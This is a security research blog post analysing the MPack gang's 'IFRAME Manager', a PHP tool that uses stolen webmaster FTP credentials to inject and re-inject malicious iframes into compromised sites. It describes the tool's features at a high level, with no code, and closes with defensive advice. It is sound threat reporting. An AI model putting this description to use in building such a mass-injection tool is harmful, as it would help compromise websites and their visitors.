MPack: the Strange Case of the Mass-Hacking Tool

You always thought that by staying clear ofthe dark alleys of the Internet and visiting only “reputable” websites,you would be safe from attacks and dubious content. I am afraid that isnot enough. My colleagues Elia Florio and Hon Lau reported recently (here and here)about legitimate sites that had been compromised to include a maliciousIFRAME that, without your knowledge, redirects you to a site servingexploits.

As Elia mentioned, thousands of sites (mostly Italian, but withseveral other nationalities included) were compromised. We were puzzledas to how the MPack gang had managed to hack so many sites in a shortperiod of time, and how they could inject the malicious iframe soquickly.

The MPack gang appears to be using an IFRAME Manager tool toautomate the task on a large scale. This is basically an FTP updaterclient, written in PHP language, that runs on a webserver with MySQL asback-end. It takes as input a list of website administrator accounts(possibly obtained in the black market). It then periodically checksthe home pages of those sites to inject a chosen IFRAME into their code.

This iframe manager is another example of a very user-friendly toolwith a clear intent of being resold to multiple hacking groups. Assuch, it offers a number of interesting features. It allows for theiframe to be injected at the top or bottom of the page and you can useregular expressions when defining the pages to be compromised, such asindex[.php|.htm|.html]|default.asp. To maximize thereturn-on-investment, the tool can check the Google PageRank for thepotential websites before injecting the iframe, allowing you to selectany number of sites with a certain PageRank in a certain country.Furthermore, the tool can be left running and will cycle through thelist of sites and re-inject the iframe, should the pages have beencleaned by the site administrator.

To assist the miscreants in this competitive hacker-eat-hackerworld, the tool also allows for the removal of any competitors’ iframesinjected in the page. And of course, extensive logs and statistics areprovided.

This tool itself however, cannot hack the websites; it relies on alist of compromised credentials to insert the desired iframe into thewebsites. Therefore a simple clean-up of the page is not sufficient;the site administrator’s credentials need to be changed. To protectyourself as a web surfer, make sure your operating system is up to datewith latest patches as well as your anti-virus program.